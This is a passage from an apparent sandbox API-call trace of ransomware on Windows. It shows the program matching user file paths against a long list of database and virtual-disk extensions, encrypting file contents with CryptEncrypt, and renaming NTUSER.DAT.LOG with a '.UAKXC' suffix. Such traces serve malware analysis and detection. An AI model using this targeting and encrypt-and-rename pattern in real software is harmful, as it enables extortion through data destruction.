[0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".pan") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".pdb") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".pdm") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".pnz") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".qry") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".qvd") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".rbf") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".rctd") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".rod") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".rodx") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".rpd") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".rsd") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sas7bdat") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sbf") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".scx") returned 0x0 [0146.026] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sdb") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sdc") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sdf") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sis") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".spq") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sql") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sqlite") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sqlite3") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".sqlitedb") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".te") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".temx") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".tmd") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".tps") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".trc") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".trm") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".udb") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".udl") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".usr") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".v12") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vis") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vpd") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vvv") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".wdb") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".wmdb") returned 0x0 [0146.027] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".wrk") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".xdb") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".xld") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".xmlff") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".abcddb") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".abs") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".abx") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".accdw") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".adn") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".db2") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".fm5") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".hjt") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".icg") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".icr") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".kdb") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".lut") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".maw") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mdn") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".mdt") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vdi") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vhd") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vmdk") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".pvm") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vmem") returned 0x0 [0146.028] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vmsn") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vmsd") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".nvram") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vmx") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".raw") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".qcow2") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".subvol") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".bin") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vsv") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".avhd") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vmrs") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vhdx") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".avdx") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".vmcx") returned 0x0 [0146.029] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT.LOG", lpSrch=".iso") returned 0x0 [0146.029] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.029] WriteFile (in: hFile=0x714, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0146.956] WriteFile (in: hFile=0x714, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0146.956] SetEndOfFile (hFile=0x714) returned 1 [0146.956] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.956] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x400, lpOverlapped=0x0) returned 1 [0146.956] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xfffffc00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.956] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x400, lpOverlapped=0x0) returned 1 [0146.956] CloseHandle (hObject=0x714) returned 1 [0146.957] GetProcessHeap () returned 0xea0000 [0146.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0146.958] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\Users\\Default\\NTUSER.DAT.LOG" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG") returned="C:\\Users\\Default\\NTUSER.DAT.LOG" [0146.958] lstrcatW (in: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG", lpString2=".UAKXC" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG.UAKXC") returned="C:\\Users\\Default\\NTUSER.DAT.LOG.UAKXC" [0146.959] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.LOG.UAKXC" (normalized: "c:\\users\\default\\ntuser.dat.log.uakxc")) returned 1 [0146.959] GetProcessHeap () returned 0xea0000 [0146.960] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0146.960] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1728 | out: hHeap=0xea0000) returned 1 [0146.960] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d08 | out: hHeap=0xea0000) returned 1 [0146.960] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0146.960] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0146.960] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0146.960] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2")) returned 0x22 [0146.961] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0146.961] GetLastError () returned 0x0 [0146.961] GetFileSizeEx (in: hFile=0x714, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=0) returned 1 [0146.961] CloseHandle (hObject=0x714) returned 1 [0146.961] CloseHandle (hObject=0x714) returned 0 [0146.961] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec36b0 | out: hHeap=0xea0000) returned 1 [0146.961] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d58 | out: hHeap=0xea0000) returned 1 [0146.961] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0146.961] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0146.961] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0146.962] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf")) returned 0x26 [0146.962] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0146.962] GetLastError () returned 0x0 [0146.962] GetFileSizeEx (in: hFile=0x714, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=65536) returned 1 [0146.962] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".4dd") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".4dl") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".accdb") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".accdc") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".accde") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".accdr") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".accdt") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".accft") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".adb") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ade") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".adf") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".adp") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".arc") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ora") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".alf") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ask") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".btr") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".bdf") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".cat") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".cdb") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ckp") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".cma") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".cpd") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dacpac") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dad") returned 0x0 [0146.963] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dadiagrams") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".daschema") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".db") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".db-shm") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".db-wal") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".db3") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dbc") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dbf") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dbs") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dbt") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dbv") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dbx") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dcb") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dct") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dcx") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ddl") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dlis") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dp1") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dqy") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dsk") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dsn") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dtsx") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dxl") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".eco") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ecx") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".edb") returned 0x0 [0146.964] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".epim") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".exb") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fcd") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fdb") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fic") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fmp") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fmp12") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fmpsl") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fol") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fp3") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fp4") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fp5") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fp7") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fpt") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".frm") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".gdb") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".grdb") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".gwi") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".hdb") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".his") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ib") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".idb") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", 